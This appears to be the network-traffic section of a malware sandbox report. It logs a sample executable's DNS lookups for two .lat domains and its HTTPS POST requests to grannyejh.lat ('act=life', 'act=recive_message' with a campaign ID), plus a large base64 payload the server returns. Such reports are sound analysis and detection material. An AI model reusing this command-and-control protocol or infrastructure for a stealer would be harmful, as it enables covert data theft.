                                                                                                                Dec 19, 2024 08:36:41.498337984 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:41.498393059 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:41.543339014 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.363426924 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.363554001 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.363723993 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.363982916 CET49734443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.364003897 CET44349734104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.545492887 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.545536995 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:42.545607090 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.545905113 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:42.545916080 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.756840944 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.756932974 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.758394957 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.758400917 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.758627892 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.760005951 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.760169029 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.760190964 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:43.760258913 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:43.760267973 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:44.763829947 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:44.763941050 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:44.763993025 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:44.766139984 CET49742443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:44.766154051 CET44349742104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:45.352207899 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:45.352261066 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:45.352314949 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:45.352663994 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:45.352674007 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.568013906 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.568113089 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.569375038 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.569385052 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.569622040 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:46.571120977 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.571214914 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:46.571222067 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:47.431180954 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:47.431267023 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:47.431340933 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:47.431551933 CET49749443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:47.431566000 CET44349749104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:48.070538998 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:48.070600986 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:48.070710897 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:48.071139097 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:48.071156979 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.282565117 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.282618999 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.283720970 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.283730030 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.283958912 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.285253048 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.285990953 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286032915 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286117077 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286138058 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286231041 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286258936 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286354065 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286375046 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286473036 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286505938 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.286626101 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.286643982 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.331324100 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.331470966 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.331506968 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.379323006 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.379447937 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.379483938 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.379496098 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.423327923 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.423486948 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.423521996 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.471330881 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.471445084 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.515336990 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.527796984 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.527940035 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:49.527976990 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:49.647670984 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.634711027 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.634804010 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.634963989 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.635155916 CET49758443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.635178089 CET44349758104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.668678999 CET49769443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.668721914 CET44349769104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:52.668828964 CET49769443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.669187069 CET49769443192.168.2.9104.21.64.80
                                                                                                                Dec 19, 2024 08:36:52.669202089 CET44349769104.21.64.80192.168.2.9
                                                                                                                Dec 19, 2024 08:36:53.055357933 CET49769443192.168.2.9104.21.64.80

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 19, 2024 08:36:33.085082054 CET5806653192.168.2.91.1.1.1
                                                                                                                Dec 19, 2024 08:36:33.222780943 CET53580661.1.1.1192.168.2.9
                                                                                                                Dec 19, 2024 08:36:33.224766970 CET6543253192.168.2.91.1.1.1
                                                                                                                Dec 19, 2024 08:36:33.362574100 CET53654321.1.1.1192.168.2.9

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 19, 2024 08:36:33.085082054 CET192.168.2.91.1.1.10x38fcStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                Dec 19, 2024 08:36:33.224766970 CET192.168.2.91.1.1.10xbcd2Standard query (0)grannyejh.latA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 19, 2024 08:36:26.682127953 CET1.1.1.1192.168.2.90xef8cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                Dec 19, 2024 08:36:26.682127953 CET1.1.1.1192.168.2.90xef8cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                Dec 19, 2024 08:36:33.222780943 CET1.1.1.1192.168.2.90x38fcName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                Dec 19, 2024 08:36:33.362574100 CET1.1.1.1192.168.2.90xbcd2No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false
                                                                                                                Dec 19, 2024 08:36:33.362574100 CET1.1.1.1192.168.2.90xbcd2No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • grannyejh.lat

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.949717104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:34 UTC260OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-19 07:36:35 UTC1115INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:35 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=oivgeqf2t1nu15hlrq2q46a0cr; expires=Mon, 14 Apr 2025 01:23:14 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3i7OX91XQuHdv%2BaXr4ea68AfeGdPdgfZWTgwRM2f4fA5qpiQHO7g5OyA3FYivZ4KzxQfbe0Y1amC908KBVbVG6Kmz%2F61oKCDt2MQqjcsqJZLkeVfYdNxvoPyWMlqQToO"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b8f209e472ad-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1793&rtt_var=686&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=904&delivery_rate=1579232&cwnd=234&unsent_bytes=0&cid=901e5c6fc00067b5&ts=930&x=0"
                                                                                                                2024-12-19 07:36:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-19 07:36:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.949723104.21.64.804437684C:\Users\user\Desktop\661fW9gxDp.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-19 07:36:36 UTC261OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: grannyejh.lat
                                                                                                                2024-12-19 07:36:36 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                2024-12-19 07:36:37 UTC1117INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 19 Dec 2024 07:36:37 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=bveru2idb18ugrsev59970gic8; expires=Mon, 14 Apr 2025 01:23:16 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gGVWM2XhLOsogfuBJzj6Gt4F%2FP4vNabd%2BbBVxQdKeeM28fSSHL4J8T4vy99PBBrk2YJ1CHdG3g76SkebfFHuJwpV5jPoD2YE4TmYhWNvcRS6f7U0QKRd%2FozS12Jnisg5"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f45b8ff4d0642cf-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1565&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=944&delivery_rate=1785932&cwnd=252&unsent_bytes=0&cid=f3861ad3341518a5&ts=821&x=0"
                                                                                                                2024-12-19 07:36:37 UTC252INData Raw: 34 39 31 63 0d 0a 67 6c 30 30 68 6b 6e 45 54 4f 36 6a 70 65 35 36 2b 59 4f 2b 42 6f 2f 69 39 75 6f 57 55 74 36 79 36 47 62 4c 71 6d 43 6b 6a 51 50 35 66 30 4b 6b 63 2f 42 67 7a 4e 44 41 7a 45 43 4e 38 63 74 6a 6f 38 43 58 6a 6a 52 6f 75 4e 4f 45 46 61 36 47 51 74 4c 67 49 62 67 37 56 65 6f 36 6f 57 44 4d 78 74 33 4d 51 4b 4c 34 6e 47 50 68 77 4d 7a 49 63 7a 69 38 30 34 51 45 71 73 45 50 31 4f 46 67 36 6a 46 54 37 69 79 6e 4b 49 2f 50 79 49 73 66 6e 4f 4c 55 61 4f 61 50 6e 6f 63 30 66 76 7a 58 6b 6b 54 78 69 43 33 42 2b 57 4c 50 50 45 66 74 61 37 6c 67 6c 59 48 41 67 46 6a 44 6f 64 39 6a 37 59 36 51 6a 6e 30 36 74 74 71 4d 42 61 2f 41 45 4d 33 72 61 2b 6f 2f 55 4f 38 6d 72 6a 79 43 78 63 2b 41 47 5a 62 69 6e 43 71 74 68 34 7a 49 4c 48 44 76 34 6f
                                                                                                                Data Ascii: 491cgl00hknETO6jpe56+YO+Bo/i9uoWUt6y6GbLqmCkjQP5f0Kkc/BgzNDAzECN8ctjo8CXjjRouNOEFa6GQtLgIbg7Veo6oWDMxt3MQKL4nGPhwMzIczi804QEqsEP1OFg6jFT7iynKI/PyIsfnOLUaOaPnoc0fvzXkkTxiC3B+WLPPEfta7lglYHAgFjDod9j7Y6Qjn06ttqMBa/AEM3ra+o/UO8mrjyCxc+AGZbinCqth4zILHDv4o
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 6b 56 75 4e 30 50 31 75 6b 68 2f 33 46 50 70 43 79 71 62 74 53 42 7a 34 41 57 6e 75 4c 54 59 2b 79 41 68 6f 64 30 4d 37 54 59 6a 67 36 6d 78 77 33 49 35 57 62 6f 4e 6c 48 72 4c 4b 34 6f 67 38 4b 48 77 6c 69 63 2b 5a 77 38 72 61 43 45 69 33 63 6b 73 63 48 4b 47 2b 66 52 51 73 48 6a 49 62 68 2f 55 4f 6f 71 71 79 36 65 79 63 79 48 48 59 6e 71 31 57 6e 67 67 4a 6d 43 65 7a 4f 38 31 34 41 4f 70 73 49 47 79 2b 4a 6e 34 44 38 57 71 6d 75 68 4e 73 79 5a 68 36 38 64 69 2b 62 51 63 71 2b 36 31 4a 63 36 4b 66 7a 58 68 6b 54 78 69 41 72 44 37 47 4c 72 4d 46 58 73 49 4c 51 75 6e 73 66 4b 69 51 71 64 35 4e 4a 75 37 70 4b 65 68 6e 49 7a 74 64 75 44 41 61 37 4d 51 6f 69 76 5a 76 68 2f 44 71 51 4b 71 79 57 41 79 39 43 4d 57 49 53 76 78 53 54 71 6a 4e 54 51 4e 44 53 39 31
                                                                                                                Data Ascii: kVuN0P1ukh/3FPpCyqbtSBz4AWnuLTY+yAhod0M7TYjg6mxw3I5WboNlHrLK4og8KHwlic+Zw8raCEi3ckscHKG+fRQsHjIbh/UOoqqy6eycyHHYnq1WnggJmCezO814AOpsIGy+Jn4D8WqmuhNsyZh68di+bQcq+61Jc6KfzXhkTxiArD7GLrMFXsILQunsfKiQqd5NJu7pKehnIztduDAa7MQoivZvh/DqQKqyWAy9CMWISvxSTqjNTQNDS91
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 50 47 6f 61 33 49 63 6f 38 51 75 63 68 35 42 75 50 7a 38 6d 4c 44 74 76 2b 6b 6e 32 74 68 35 6a 49 4c 48 43 78 30 59 49 43 75 38 63 50 78 65 46 76 37 7a 70 5a 37 43 75 6d 49 34 6e 46 7a 49 63 62 6c 75 58 4f 62 75 32 49 6b 59 6c 2b 4f 76 79 65 79 67 4f 78 69 46 71 47 33 6e 62 72 66 57 50 6e 4a 61 67 70 6d 6f 48 59 77 67 48 62 35 74 41 6b 74 63 43 5a 67 48 45 31 73 39 47 41 43 71 7a 43 44 73 37 68 59 76 49 77 55 75 51 6e 72 69 53 42 7a 38 4f 45 45 5a 44 71 32 6d 54 73 69 74 54 47 4e 44 65 6b 6b 4e 4a 45 6e 63 38 4f 79 2b 41 6a 31 54 78 59 36 69 79 77 62 70 4f 50 33 73 77 66 6c 36 47 45 4a 4f 47 4a 6c 49 4e 2b 4e 4c 7a 58 68 77 47 71 7a 77 48 4c 36 47 76 75 4f 46 4c 6f 49 71 73 6f 6a 4d 62 44 69 51 71 65 36 4e 42 6f 72 63 37 55 6a 32 78 77 35 4a 43 6c 41 37
                                                                                                                Data Ascii: PGoa3Ico8Quch5BuPz8mLDtv+kn2th5jILHCx0YICu8cPxeFv7zpZ7CumI4nFzIcbluXObu2IkYl+OvyeygOxiFqG3nbrfWPnJagpmoHYwgHb5tAktcCZgHE1s9GACqzCDs7hYvIwUuQnriSBz8OEEZDq2mTsitTGNDekkNJEnc8Oy+Aj1TxY6iywbpOP3swfl6GEJOGJlIN+NLzXhwGqzwHL6GvuOFLoIqsojMbDiQqe6NBorc7Uj2xw5JClA7
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 35 6d 6a 79 4d 56 6a 74 4a 71 41 6d 69 38 2f 4b 68 78 36 51 35 74 74 69 34 49 69 5a 6a 58 63 78 75 4e 71 59 42 36 4c 43 44 38 79 76 4c 36 41 34 54 71 52 7a 35 67 6d 41 36 4e 65 58 43 6f 32 68 77 79 72 30 77 4a 4f 45 4e 47 6a 38 30 34 55 4e 70 73 41 4b 79 65 42 6c 37 6a 6c 51 36 53 36 70 4a 4a 37 4a 79 59 45 54 6c 4f 72 4f 5a 4f 43 45 6d 49 78 38 4f 37 61 51 78 45 53 75 30 45 4b 65 72 31 54 74 4d 46 62 6e 50 65 59 78 77 74 69 48 69 78 54 62 75 5a 78 6f 34 34 43 62 68 48 67 37 74 4e 47 47 43 71 37 4e 43 38 37 6e 63 2b 45 37 58 75 55 6c 71 53 2b 49 78 4d 4b 49 48 35 2f 6e 30 79 53 6a 77 4a 4f 51 4e 47 6a 38 2f 36 30 78 36 2b 6b 34 68 76 41 76 2b 58 39 52 36 47 76 2b 62 6f 44 43 79 34 51 58 6e 65 6a 51 62 75 53 4c 6d 49 4e 77 50 4c 58 56 6a 41 57 73 7a 51 50
                                                                                                                Data Ascii: 5mjyMVjtJqAmi8/Khx6Q5tti4IiZjXcxuNqYB6LCD8yvL6A4TqRz5gmA6NeXCo2hwyr0wJOENGj804UNpsAKyeBl7jlQ6S6pJJ7JyYETlOrOZOCEmIx8O7aQxESu0EKer1TtMFbnPeYxwtiHixTbuZxo44CbhHg7tNGGCq7NC87nc+E7XuUlqS+IxMKIH5/n0ySjwJOQNGj8/60x6+k4hvAv+X9R6Gv+boDCy4QXnejQbuSLmINwPLXVjAWszQP
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 6a 46 62 36 79 4f 75 4a 34 33 46 77 6f 45 65 6c 2b 76 64 59 2b 4f 4f 6e 4d 67 36 63 4c 76 49 79 6c 7a 70 36 52 4c 64 2f 58 66 74 48 6c 76 72 61 37 6c 67 6c 59 48 41 67 46 6a 44 6f 64 56 32 36 59 32 47 67 58 4d 2b 73 39 4f 59 42 61 54 44 45 4d 48 67 5a 65 63 7a 55 4f 73 74 70 79 75 47 7a 63 43 4a 45 35 54 74 6e 43 71 74 68 34 7a 49 4c 48 43 53 32 35 6b 54 71 73 59 4a 30 50 51 68 2f 33 46 50 70 43 79 71 62 74 53 42 78 49 63 54 6e 2b 48 51 5a 4f 6d 4e 6c 4a 70 37 4e 37 76 5a 67 52 61 6a 7a 77 58 4e 35 32 72 76 4f 55 54 6f 4a 62 51 72 6e 74 4f 48 77 6c 69 63 2b 5a 77 38 72 62 61 54 6d 47 51 7a 2f 75 47 63 42 37 2f 44 44 38 71 76 66 71 34 6d 46 75 4d 6e 35 6e 62 4d 78 38 69 46 47 35 54 67 31 57 6a 67 68 5a 32 4e 64 54 61 34 32 6f 41 45 72 38 34 44 77 2b 56 69
                                                                                                                Data Ascii: jFb6yOuJ43FwoEel+vdY+OOnMg6cLvIylzp6RLd/XftHlvra7lglYHAgFjDodV26Y2GgXM+s9OYBaTDEMHgZeczUOstpyuGzcCJE5TtnCqth4zILHCS25kTqsYJ0PQh/3FPpCyqbtSBxIcTn+HQZOmNlJp7N7vZgRajzwXN52rvOUToJbQrntOHwlic+Zw8rbaTmGQz/uGcB7/DD8qvfq4mFuMn5nbMx8iFG5Tg1WjghZ2NdTa42oAEr84Dw+Vi
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 52 7a 35 69 32 4c 77 73 61 47 45 5a 66 75 32 32 44 2f 69 70 4f 61 64 54 47 33 33 59 59 45 70 4d 55 49 78 2b 5a 73 37 44 4a 52 34 79 53 6a 62 73 4b 42 77 4a 52 59 77 36 48 39 61 65 61 4d 7a 39 49 30 4c 2f 4c 4a 79 67 4f 6c 69 46 71 47 37 32 76 6c 4e 56 76 6e 4a 4b 55 38 6a 63 66 56 6a 42 57 52 38 39 5a 76 36 49 32 5a 68 58 63 32 75 74 75 47 46 71 44 49 41 63 32 76 4c 36 41 34 54 71 52 7a 35 67 32 62 31 38 32 4c 46 49 33 71 33 57 66 37 6a 59 54 49 4f 6e 43 74 31 35 74 45 38 64 34 53 30 65 68 2b 72 69 59 57 34 79 66 6d 64 73 7a 48 7a 6f 6f 66 6e 65 2f 4f 59 65 75 50 6d 34 46 39 4e 4c 54 54 69 67 43 74 7a 77 66 46 34 32 72 6e 50 46 6e 67 49 71 67 6e 67 34 47 4a 7a 42 2b 44 6f 59 51 6b 7a 4a 75 58 68 48 6c 77 6f 35 36 54 52 4b 37 45 51 70 36 76 62 65 34 36 56
                                                                                                                Data Ascii: Rz5i2LwsaGEZfu22D/ipOadTG33YYEpMUIx+Zs7DJR4ySjbsKBwJRYw6H9aeaMz9I0L/LJygOliFqG72vlNVvnJKU8jcfVjBWR89Zv6I2ZhXc2utuGFqDIAc2vL6A4TqRz5g2b182LFI3q3Wf7jYTIOnCt15tE8d4S0eh+riYW4yfmdszHzoofne/OYeuPm4F9NLTTigCtzwfF42rnPFngIqgng4GJzB+DoYQkzJuXhHlwo56TRK7EQp6vbe46V
                                                                                                                2024-12-19 07:36:37 UTC1369INData Raw: 70 6d 6f 50 79 6a 78 61 56 35 73 6f 6b 38 72 2f 61 79 48 73 71 2f 49 69 7a 48 65 6e 50 44 6f 61 33 49 66 55 34 56 75 4d 78 73 43 6d 41 30 4d 79 42 46 4c 6e 75 32 33 4c 75 6a 35 65 5a 66 58 79 33 33 63 70 4b 36 63 38 61 68 72 63 68 7a 7a 68 41 35 77 53 6c 50 34 57 42 69 63 77 66 6a 61 47 45 4a 4e 50 41 68 6f 74 6b 4d 37 50 42 74 45 54 78 30 54 79 47 35 48 66 6e 4c 31 58 79 49 4b 73 69 6e 66 2b 48 31 45 7a 4a 73 34 34 32 76 35 2f 55 6c 30 74 2b 2f 4e 48 4b 58 4a 44 52 51 74 43 76 4f 62 4a 78 46 76 5a 72 2f 6d 37 4c 77 74 57 65 48 70 6a 33 33 79 50 54 76 72 4f 65 66 6a 65 73 31 35 30 4c 36 59 5a 43 79 61 38 35 32 58 39 66 34 7a 43 33 4f 49 48 52 77 4d 77 6e 31 61 48 45 4a 4c 58 41 6f 59 74 36 50 72 76 47 6d 30 6d 4f 33 67 6a 42 2f 32 62 33 4d 42 61 71 61 36
                                                                                                                Data Ascii: pmoPyjxaV5sok8r/ayHsq/IizHenPDoa3IfU4VuMxsCmA0MyBFLnu23Luj5eZfXy33cpK6c8ahrchzzhA5wSlP4WBicwfjaGEJNPAhotkM7PBtETx0TyG5HfnL1XyIKsinf+H1EzJs442v5/Ul0t+/NHKXJDRQtCvObJxFvZr/m7LwtWeHpj33yPTvrOefjes150L6YZCya852X9f4zC3OIHRwMwn1aHEJLXAoYt6PrvGm0mO3gjB/2b3MBaqa6
